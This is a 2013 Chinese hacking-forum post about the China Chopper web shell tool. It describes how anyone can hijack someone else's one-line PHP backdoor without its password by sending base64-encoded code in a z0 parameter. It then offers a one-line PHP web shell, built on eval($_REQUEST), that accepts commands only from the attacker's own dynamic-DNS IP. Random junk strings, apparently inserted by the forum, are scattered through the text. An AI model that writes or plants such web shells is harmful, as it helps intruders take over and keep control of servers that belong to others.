找回密码
 立即注册
查看: 2752|回复: 0
打印 上一主题 下一主题

中国菜刀 maicaidao 网站管理软件 0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:45:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
$ U) R/ L. O1 s# X8 M! h) j; _3 {- r! |
就算你设置了密码,使用了eval($_REQUEST['moyo']);6 j  O* h& j) v0 i: ?
! T. R5 E& s# l* |7 C' k- x
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门# P* w8 ^1 r  @
4 Y6 t" ~# F  p  x9 g/ d, a1 c
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
; Z/ a9 @5 ?' s- l
" K; O( ^( T3 }. L0 l: {0 J直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
7 p$ F3 B& H9 H7 z
/ o/ `( @9 O  f1 y& V1 K9 y$ c: r不知道是设计缺陷还是故意留的后门
7 Z3 q3 W) {; f3 d" Z- U( s# e7 u' ^" c. ~% J. N5 f% Y) s: I
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
- V0 K/ L& q& k% e6 l& @, ]* t2 x
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org" Q9 Y& ~, n0 Z3 K& J" W/ [
( j$ W' g! i) p% K' M# L% y, y/ w  N
然后一句话后门这样写
- B+ i) w# k7 [" Q
' x  W3 Z/ A9 x, |9 t<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
& W1 L+ h- d1 c0 h  \0 r6 C这样就可以让一句话后门只允许自己的电脑连接了% K& n0 ?, [, o' D% }
" m& A3 C' e4 X: V, B1 ]1 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表